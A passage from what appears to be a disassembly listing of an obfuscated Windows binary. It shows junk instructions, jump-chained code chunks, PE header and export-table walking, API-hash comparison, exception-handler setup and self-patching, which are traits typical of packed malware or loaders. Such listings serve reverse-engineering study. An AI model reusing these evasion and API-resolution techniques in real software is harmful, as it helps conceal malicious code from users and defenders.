sub_4266B5 endp
; ---------------------------------------------------------------------------
loc_4266BE: ; CODE XREF: hjohnhn9:00423E5F�j
jz sub_4283C9
rol ebp, 1Eh
jmp sub_427A58
; ---------------------------------------------------------------------------
loc_4266CC: ; CODE XREF: hjohnhn9:004261A6�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
jnz loc_426F68
mov eax, [ebp-20h]
jmp loc_426102
; ---------------------------------------------------------------------------
xor edx, 1B2A15EAh
xor edx, edi
jmp sub_428DF9
; ---------------------------------------------------------------------------
loc_4266F0: ; DATA XREF: sub_427486:loc_424E94�o
rol eax, 1Ah
push offset sub_424A9D
jmp locret_425F6D
; ---------------------------------------------------------------------------
add edi, 6AE1C4D4h
jmp sub_4238CC
; =============== S U B R O U T I N E =======================================
sub_426708 proc near ; CODE XREF: sub_424161-610�p
; sub_4240AE+3602�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004247A4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004261BC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426311 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004264AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426947 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00426E5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283D8 SIZE 00000008 BYTES
jnb sub_426604
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_4264AD
sub_426708 endp
; ---------------------------------------------------------------------------
loc_42671A: ; CODE XREF: hjohnhn9:loc_428B6C�j
or esi, 0B73C976Fh
add esi, 8457B61h
mov esi, [esi]
xchg esi, [esp]
jmp locret_427E75
; ---------------------------------------------------------------------------
jb loc_4287BA
jmp loc_42417B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E94
loc_42673C: ; CODE XREF: sub_425E94+A�j
jmp nullsub_115
; END OF FUNCTION CHUNK FOR sub_425E94
; =============== S U B R O U T I N E =======================================
sub_426741 proc near ; CODE XREF: sub_42774F+4�p
mov dword ptr [eax], 0
locret_426747: ; CODE XREF: hjohnhn9:loc_424F1A�j
retn
sub_426741 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_426749 proc near ; CODE XREF: sub_4284CB+18�p
; FUNCTION CHUNK AT 0042373A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004281F8 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00428E46 SIZE 0000001F BYTES
push ebp
jmp loc_428E46
sub_426749 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42441D
loc_42674F: ; CODE XREF: sub_42441D+D�j
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
push offset loc_426AC3
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_42441D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_426762: ; CODE XREF: sub_423CDB:loc_424BB4�j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_4244EE
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
jmp loc_425076
; END OF FUNCTION CHUNK FOR sub_423CDB
; =============== S U B R O U T I N E =======================================
sub_42677F proc near ; CODE XREF: sub_424A28:loc_427ACF�j
; sub_424A28+4492�j
var_14 = dword ptr -14h
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00423C56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F33 SIZE 00000007 BYTES
push ebp
push ebp
mov ebp, esi
xchg ebp, [esp+8+var_8]
push edi
push ebx
push edx
jmp loc_423C56
sub_42677F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427994
loc_42678E: ; CODE XREF: sub_427994-3F94�j
mov eax, [eax]
cmp dword ptr [eax], 4550h
loc_426796: ; CODE XREF: hjohnhn9:loc_426632�j
jnz loc_42476D
jmp loc_427904
; END OF FUNCTION CHUNK FOR sub_427994
; ---------------------------------------------------------------------------
jnb loc_427F49
jmp loc_427790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_4267AC: ; CODE XREF: sub_425CB3:loc_427B97�j
add ecx, 5089408Eh
xor ecx, 3DE8ABC3h
xchg ecx, [esp+0Ch+var_C]
push eax
lea eax, sub_428F4A
push eax
push 0
push 0
jmp loc_427860
; END OF FUNCTION CHUNK FOR sub_425CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_4267CC: ; CODE XREF: sub_42851A+446�j
pop ecx
mov eax, ds:dword_428384
or eax, eax
jnz loc_423692
jmp loc_4269E6
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_4267E0: ; CODE XREF: sub_428477+4�j
cmp ds:dword_423954, 0
call sub_424631
loc_4267EC: ; CODE XREF: hjohnhn9:00426383�j
jmp loc_42395D
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_4267F1: ; CODE XREF: sub_423CDB+10�j
jz loc_4244EE
call nullsub_2
loc_4267FC: ; CODE XREF: sub_423B05+15C�j
; sub_425029:loc_4270BB�j ...
jo loc_426268
xor eax, eax
call sub_4250C3
loc_426809: ; CODE XREF: sub_4264CF+ED3�j
jmp loc_426B1F
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_42680E: ; CODE XREF: sub_4237F4+45E7�j
rol eax, 12h
push edi
mov edi, eax
xchg edi, [esp+0]
call sub_4244F5
retn
; END OF FUNCTION CHUNK FOR sub_4237F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_42681D: ; CODE XREF: sub_427D6A-2C33�j
; sub_4244F5:loc_425E44�j ...
push offset loc_424DD7
jmp nullsub_20
; END OF FUNCTION CHUNK FOR sub_4244F5
; =============== S U B R O U T I N E =======================================
sub_426827 proc near ; DATA XREF: sub_425BD2-1438�o
dec dword ptr [ebp-10h]
inc dword ptr [ebp-4]
call sub_426C09
locret_426832: ; CODE XREF: sub_4279C8:loc_429013�j
retn
sub_426827 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_426833: ; CODE XREF: sub_42304F+40C5�j
jmp loc_4243F2
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
shr eax, 17h
jmp loc_4278B7
; ---------------------------------------------------------------------------
sbb edi, ebx
jmp sub_426BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427032
loc_426847: ; CODE XREF: sub_427032:loc_427E4F�j
call sub_426859
jnz loc_425B24
loc_426852: ; CODE XREF: sub_426E8C:loc_42804B�j
mov eax, ebx
jmp loc_425B26
; END OF FUNCTION CHUNK FOR sub_427032
; =============== S U B R O U T I N E =======================================
sub_426859 proc near ; CODE XREF: sub_426E8C-25AB�p
; sub_427032:loc_426847�p ...
; FUNCTION CHUNK AT 0042898F SIZE 00000005 BYTES
mov eax, [ebx+ecx]
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
jmp loc_42898F
sub_426859 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4275A3
loc_42686B: ; CODE XREF: sub_4275A3+A�j
jmp loc_426134
; END OF FUNCTION CHUNK FOR sub_4275A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_426870: ; CODE XREF: sub_427C9B-2D1B�j
jmp nullsub_121
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_426875: ; CODE XREF: sub_424819:loc_426B97�j
jnz loc_428ED0
loc_42687B: ; CODE XREF: sub_428436+5�j
jmp nullsub_50
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
jns loc_428626
ror edx, 8
loc_426889: ; CODE XREF: hjohnhn9:004281DF�j
jmp loc_428ED0
; ---------------------------------------------------------------------------
loc_42688E: ; CODE XREF: hjohnhn9:loc_4249BA�j
mov edx, [ebp+8]
or [edx-8], eax
; START OF FUNCTION CHUNK FOR sub_424631
loc_426894: ; CODE XREF: sub_428C4E:loc_425EA4�j
; sub_426604:loc_428C3F�j ...
jo loc_4233F8
cmp dword ptr [ebp-14h], 4
jnz loc_424F28
loc_4268A4: ; CODE XREF: hjohnhn9:00424461�j
mov eax, [ebp+8]
jmp loc_4243ED
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
sbb esi, eax
jmp sub_4264FA
; ---------------------------------------------------------------------------
loc_4268B3: ; CODE XREF: hjohnhn9:00424FFB�j
jb loc_424DC6
inc ds:dword_4233C4
lea eax, nullsub_123
mov byte ptr [eax], 0C3h
push edx
push 0E3CA6C32h
jmp loc_427B88
; ---------------------------------------------------------------------------
loc_4268D3: ; DATA XREF: sub_424D38+3D79�o
test al, al
jnz loc_427BB5
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_4268DB: ; CODE XREF: sub_4250FC+4�j
; sub_4287BF:loc_427234�j ...
call sub_4248F9
loc_4268E0: ; CODE XREF: hjohnhn9:004232FD�j
jmp loc_423361
; END OF FUNCTION CHUNK FOR sub_4250FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_4268E5: ; CODE XREF: sub_4231AD:loc_426A62�j
cmp al, 0C2h
jz loc_427555
mov eax, [ebp-4]
mov ax, [eax]
jmp loc_424CEC
; END OF FUNCTION CHUNK FOR sub_4231AD
; ---------------------------------------------------------------------------
loc_4268F8: ; CODE XREF: hjohnhn9:loc_42823A�j
and edx, 0B238D165h
or edx, 0F450CED8h
add edx, 0BF17789h
xchg edx, [esp]
jmp loc_425E3F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_426912: ; CODE XREF: sub_4250FC:loc_4234A7�j
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
add esp, 8
mov [ebp-4], eax
jmp loc_424D4A
; END OF FUNCTION CHUNK FOR sub_4250FC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426924 proc near ; CODE XREF: sub_4287BF-1576�p
; sub_4287BF-13B�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
; FUNCTION CHUNK AT 004233D3 SIZE 0000000E BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFD8h
jmp loc_4233D3
sub_426924 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_42692F: ; CODE XREF: sub_424631+C1C�j
or dword ptr [eax-8], 8
jmp loc_427D89
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_426938: ; CODE XREF: sub_424B4A�j
; sub_426354-17F0�j
cmp dword ptr [ebp-1Ch], 67h
push offset sub_427805
jmp nullsub_21
; END OF FUNCTION CHUNK FOR sub_426354
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_426947: ; CODE XREF: sub_426708-3F1�j
not ebp
or eax, 0F0CF36D1h
mov ebx, 6289DE42h
and ecx, edx
or eax, 4E2FC016h
jmp loc_4247A4
; END OF FUNCTION CHUNK FOR sub_426708
; =============== S U B R O U T I N E =======================================
sub_426961 proc near ; CODE XREF: sub_428CC9-3137�p
; hjohnhn9:004265E3�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042784B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004278A0 SIZE 00000017 BYTES
xchg ecx, [esp+0]
pop ecx
push eax
push 0F195E43Ah
xchg ebx, [esp+4+var_4]
mov eax, ebx
pop ebx
or eax, 4EBD3638h
jmp loc_42784B
sub_426961 endp
; ---------------------------------------------------------------------------
loc_42697C: ; CODE XREF: hjohnhn9:00428A56�j
xchg edx, [esp]
jmp nullsub_1
; ---------------------------------------------------------------------------
test edi, 2A51C452h
jmp loc_426C41
; =============== S U B R O U T I N E =======================================
sub_42698F proc near ; CODE XREF: sub_423CCD+3520�p
; hjohnhn9:004274C5�j
; FUNCTION CHUNK AT 00426E55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042726B SIZE 00000002 BYTES
xchg edx, [esp+0]
loc_426992: ; CODE XREF: hjohnhn9:0042386F�j
pop edx
inc dword ptr [ebp-8]
loc_426996: ; CODE XREF: hjohnhn9:00423B67�j
; sub_423CCD+35B6�j
mov eax, [ebp-8]
pop ecx
pop ecx
jmp loc_426E55
sub_42698F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_4269A0: ; CODE XREF: sub_42325E-7E�j
; sub_42325E+42DE�j
and ebx, 19C6FA51h
rol ebx, 14h
add ebx, 8030F40Bh
xchg ebx, [esp+18h+var_18]
jmp sub_4279ED
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
loc_4269B7: ; CODE XREF: hjohnhn9:00428801�j
jns loc_4286A7
; =============== S U B R O U T I N E =======================================
sub_4269BD proc near ; CODE XREF: sub_426924-3548�p
; FUNCTION CHUNK AT 00424117 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004266AB SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov dword ptr [ebp-14h], 4
mov eax, [ebp-14h]
mov [ebp-4], eax
mov eax, [ebp-14h]
mov [ebp-0Ch], eax
jmp loc_424117
sub_4269BD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4269D9: ; CODE XREF: hjohnhn9:loc_4282C9�j
jg near ptr dword_4236FC+35h
cmp ebp, esi
jmp loc_423977
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_4269E6: ; CODE XREF: sub_42851A-1D3F�j
jz loc_424E76
jmp loc_429107
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
cmp eax, 22C84A22h
jmp loc_424EC3
; ---------------------------------------------------------------------------
add ebp, ecx
jmp sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_426A03: ; CODE XREF: sub_424819:loc_425F9E�j
jz loc_426491
loc_426A09: ; CODE XREF: hjohnhn9:00426EBF�j
jmp loc_427B0E
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_426A0E: ; CODE XREF: sub_426F5A-3A5�j
jmp loc_42513C
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
pushf
or ecx, 0C756CE28h
mov eax, ebx
jmp loc_428AD2
; ---------------------------------------------------------------------------
ror edx, 14h
jmp sub_425E94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B19
loc_426A29: ; CODE XREF: sub_425B19+16�j
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_425B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4285DF
loc_426A2B: ; CODE XREF: sub_4285DF+7�j
jmp nullsub_77
; END OF FUNCTION CHUNK FOR sub_4285DF
; =============== S U B R O U T I N E =======================================
sub_426A30 proc near ; CODE XREF: sub_425B19+2�p
; FUNCTION CHUNK AT 00423126 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042328D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004247B9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004248F1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426BBA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426FF4 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00427179 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00427BB3 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004288AD SIZE 0000001C BYTES
push large dword ptr fs:0
mov large fs:0, esp
call sub_427032
call sub_42873F
mov edx, [ebx+3Ch]
mov edx, [ebx+edx+80h]
jmp loc_427179
sub_426A30 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D64
loc_426A58: ; CODE XREF: sub_428D64+A�j
jmp loc_428D33
; END OF FUNCTION CHUNK FOR sub_428D64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282F8
loc_426A5D: ; CODE XREF: sub_4282F8-272B�j
jmp nullsub_52
; END OF FUNCTION CHUNK FOR sub_4282F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_426A62: ; CODE XREF: sub_4231AD+11�j
jmp loc_4268E5
; END OF FUNCTION CHUNK FOR sub_4231AD
; ---------------------------------------------------------------------------
rol edi, 0Dh
push ebp
jmp sub_423F77
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xchg edx, esi
jmp loc_428655
; =============== S U B R O U T I N E =======================================
sub_426A78 proc near ; CODE XREF: sub_4279C0-2FEE�p
; hjohnhn9:00426F30�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423217 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004233C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042377B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423D47 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004250D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004250EF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425187 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425F15 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00426573 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00427436 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276FC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004279B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427B1B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428510 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428994 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428EDE SIZE 00000007 BYTES
xchg edi, [esp+0]
pop edi
mov esp, ebp
pop ebp
jmp loc_4279B6
sub_426A78 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_426A84: ; CODE XREF: sub_423BC3-4FB�j
add ebx, 0F684B8BAh
loc_426A8A: ; CODE XREF: sub_4251EB-1F19�j
cmp ebp, ecx
jmp loc_427825
; END OF FUNCTION CHUNK FOR sub_423BC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428DDB
loc_426A92: ; CODE XREF: sub_428DDB+E�j
jmp locret_428EC4
; END OF FUNCTION CHUNK FOR sub_428DDB
; ---------------------------------------------------------------------------
loc_426A97: ; DATA XREF: sub_426F85+11D3�o
inc eax
mov [ebp-1Ch], eax
mov dword ptr [ebp-18h], 0
; START OF FUNCTION CHUNK FOR sub_427852
loc_426AA2: ; CODE XREF: sub_427852+733�j
mov eax, [ebp-4]
mov edx, [ebp-14h]
jmp loc_428F16
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
loc_426AAD: ; DATA XREF: sub_424771+1�o
call sub_428F0B
push eax
push eax
call sub_428E01
call sub_4265CD
jmp loc_424723
; ---------------------------------------------------------------------------
loc_426AC3: ; DATA XREF: sub_42441D+233B�o
shr eax, 0Bh
xor [ebp-8], eax
mov eax, [ebp-8]
jmp loc_4240C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_426AD1: ; CODE XREF: sub_425029:loc_425040�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
loc_426AD7: ; CODE XREF: sub_427C9B-21A5�j
jnz loc_423031
mov eax, [ebp-8]
shl eax, 3
jmp loc_42737B
; END OF FUNCTION CHUNK FOR sub_425029
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_426AE9: ; CODE XREF: sub_42304F+437C�j
jmp loc_426C4F
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
ror ebp, 18h
jmp sub_428271
; =============== S U B R O U T I N E =======================================
sub_426AF6 proc near ; CODE XREF: hjohnhn9:004289D6�p
; hjohnhn9:00428EFD�j
xchg edx, [esp+0]
pop edx
ror eax, 7
mov ds:dword_4233A0, eax
retn
sub_426AF6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266B5
loc_426B04: ; CODE XREF: sub_4266B5+23C4�j
jmp loc_424913
; END OF FUNCTION CHUNK FOR sub_4266B5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427810
loc_426B09: ; CODE XREF: sub_427810+10�j
jmp loc_4273B2
; END OF FUNCTION CHUNK FOR sub_427810
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F77
loc_426B0E: ; CODE XREF: sub_423F77+9�j
jmp loc_423F91
; END OF FUNCTION CHUNK FOR sub_423F77
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_426B13: ; CODE XREF: sub_423CDB:loc_42886C�j
jz loc_427B9C
jmp loc_427449
; END OF FUNCTION CHUNK FOR sub_423CDB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_426B1F: ; CODE XREF: sub_423CDB:loc_426809�j
pop ecx
pop ecx
loc_426B21: ; CODE XREF: sub_424361:loc_42702D�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423CDB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_426B24: ; CODE XREF: sub_4237F4+6�j
jmp loc_427DD2
; END OF FUNCTION CHUNK FOR sub_4237F4
; =============== S U B R O U T I N E =======================================
sub_426B29 proc near ; CODE XREF: sub_4264CF:loc_427392�p
; sub_427032:loc_427E45�p
; FUNCTION CHUNK AT 00425284 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00427D8E SIZE 0000000F BYTES
push ebp
jmp loc_425284
sub_426B29 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_426B2F: ; CODE XREF: sub_4237F4+45ED�j
jz loc_4243D9
jmp loc_423963
; END OF FUNCTION CHUNK FOR sub_4237F4
; ---------------------------------------------------------------------------
loc_426B3A: ; CODE XREF: hjohnhn9:004239B3�j
; hjohnhn9:004239CB�j
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_4244EE
mov eax, [ebp-0Ch]
call sub_4244F5
jmp loc_426184
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_426B55: ; CODE XREF: sub_42345B+CF3�j
jmp nullsub_2
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B7A
loc_426B5A: ; CODE XREF: sub_427B7A:loc_427A79�j
add dword ptr [ebp-8], 4
jmp loc_42856C
; END OF FUNCTION CHUNK FOR sub_427B7A
; ---------------------------------------------------------------------------
loc_426B63: ; CODE XREF: hjohnhn9:loc_426597�j
; hjohnhn9:00427A73�j
call sub_426BD2
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_426B68: ; CODE XREF: sub_4265CD-217E�j
jmp loc_427FAF
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
and ebx, edx
mov ebp, 571DCF8Eh
jmp sub_423CDB
; ---------------------------------------------------------------------------
and eax, ebp
jmp sub_428249
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_426B80: ; CODE XREF: sub_428271+9�j
shl eax, 2
cdq
js loc_424073
add eax, [esp+0]
call sub_427852
loc_426B92: ; CODE XREF: sub_424A55+246�j
jmp loc_4286E6
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_426B97: ; CODE XREF: sub_424819-C11�j
jmp loc_426875
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
loc_426B9C: ; CODE XREF: hjohnhn9:00426F6B�j
; hjohnhn9:loc_427F49�j
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 0
jnz loc_42619C
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_426BA8: ; CODE XREF: sub_426F5A:loc_425D65�j
call sub_427E85
loc_426BAD: ; DATA XREF: sub_426CE6+16FC�o
or eax, eax
jnz loc_426FC7
jmp loc_426A0E
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_426BBA: ; CODE XREF: sub_426A30:loc_423126�j
mov ecx, [ebx+ecx+78h]
or ecx, ecx
call sub_426E8C
loc_426BC5: ; CODE XREF: sub_42790F+D�j
jmp nullsub_26
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
mov ebp, edx
pushf
jmp sub_424946
; =============== S U B R O U T I N E =======================================
sub_426BD2 proc near ; CODE XREF: hjohnhn9:00426842�j
; hjohnhn9:loc_426B63�p
; FUNCTION CHUNK AT 004235C0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00427A69 SIZE 00000003 BYTES
xchg eax, [esp+0]
pop eax
add dword ptr [ebp-8], 2
jmp loc_4235C0
sub_426BD2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_426BDF: ; CODE XREF: sub_424A78:loc_424C0C�j
; sub_424A78+1B0�j
test byte ptr [ebp-8], 20h
jz loc_428B8A
push ebp
loc_426BEA: ; CODE XREF: hjohnhn9:loc_42822C�j
mov eax, [ebp-20h]
call sub_4282F8
jmp loc_4248CB
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
loc_426BF7: ; CODE XREF: hjohnhn9:004237E4�j
sbb esi, 0A2FC903Eh
; =============== S U B R O U T I N E =======================================
sub_426BFD proc near ; CODE XREF: hjohnhn9:0042861C�p
xchg esi, [esp+0]
pop esi
push edx
mov edx, esi
call sub_424928
sub_426BFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426C09 proc near ; CODE XREF: sub_426827+6�p
; hjohnhn9:004276E6�j
; FUNCTION CHUNK AT 0042361F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424891 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425E6E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042654D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00428F8E SIZE 00000011 BYTES
xchg ecx, [esp+0]
pop ecx
cmp dword ptr [ebp-10h], 0
jge loc_424788
jmp loc_424891
sub_426C09 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426C1C proc near ; CODE XREF: hjohnhn9:00424B85�j
; sub_424161+3A88�p
xchg ebx, [esp+0]
pop ebx
call sub_423CCD
pop ecx
mov [ebp-20h], eax
jmp loc_423C90
sub_426C1C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B6C
loc_426C2E: ; CODE XREF: sub_423B6C+6�j
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
push offset loc_4235B0
loc_426C3C: ; CODE XREF: hjohnhn9:loc_42417B�j
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_423B6C
; ---------------------------------------------------------------------------
loc_426C41: ; CODE XREF: hjohnhn9:0042698A�j
jns loc_424F3E
pushf
; =============== S U B R O U T I N E =======================================
sub_426C48 proc near ; CODE XREF: hjohnhn9:0042490E�p
xchg edx, [esp+0]
pop edx
mov eax, [eax+0Ch]
sub_426C48 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42304F
loc_426C4F: ; CODE XREF: sub_42304F:loc_426AE9�j
; sub_42304F+40BE�j
js loc_42306D
mov ebx, [eax+18h]
jmp loc_424F43
; END OF FUNCTION CHUNK FOR sub_42304F
; =============== S U B R O U T I N E =======================================
sub_426C5D proc near ; DATA XREF: sub_426749-3000�o
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
sub_426C5D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
